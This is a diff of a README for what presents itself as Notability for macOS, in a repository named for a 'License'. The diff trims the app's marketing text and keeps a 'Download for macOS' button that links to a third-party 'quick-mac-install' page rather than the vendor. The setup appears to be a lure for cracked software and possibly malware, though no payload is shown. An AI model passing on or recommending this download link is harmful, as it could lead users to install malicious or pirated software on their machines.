Notability-Mac-License/Notability-Mac/README.md

 <div>
 <h3>Notability for macOS</h3>
-<p><a href="#">Notability for macOS</a> is an all-in-one note-taking app that allows you to capture and organize your thoughts, lectures, and ideas in an intuitive, easy-to-use environment.
-Whether you're taking handwritten notes with the Apple Pencil or typing on the keyboard, Notability provides all the tools you need to get your thoughts on paper.
-It's perfect for students, professionals, or anyone who needs a versatile and effective note-taking app.
+<p><a href="#">Notability for macOS</a> is an all-in-one note-taking app that allows you to capture and organize your thoughts, lectures, and ideas in an intuitive, easy-to-use environment.</p>

-One of the standout features of Notability is its ability to combine handwritten notes with text, photos, web clips, and audio recordings.
-You can record lectures or meetings and annotate them in real time, adding text or drawings as the conversation progresses.
-The app's powerful search function allows you to easily find your notes later, even if they contain handwritten content or audio recordings.
-With iCloud integration, your notes are seamlessly synced across all your Apple devices.

-With its rich feature set, Notability goes beyond simple note-taking.
-It allows you to organize your notes into subjects and dividers, export them as PDFs, and share them easily.
-Whether you’re at school, work, or home, Notability helps you stay organized and efficient by giving you a place to capture all of your important information.</p>

 <a href="https://quick-mac-install.github.io/.github/Notability">
   <img src="https://i.postimg.cc/4NYk88tL/219133640-8b7a0179-20a7-4e02-8887-fbbd2eaad64b.png" width="200" alt="Download for macOS"/>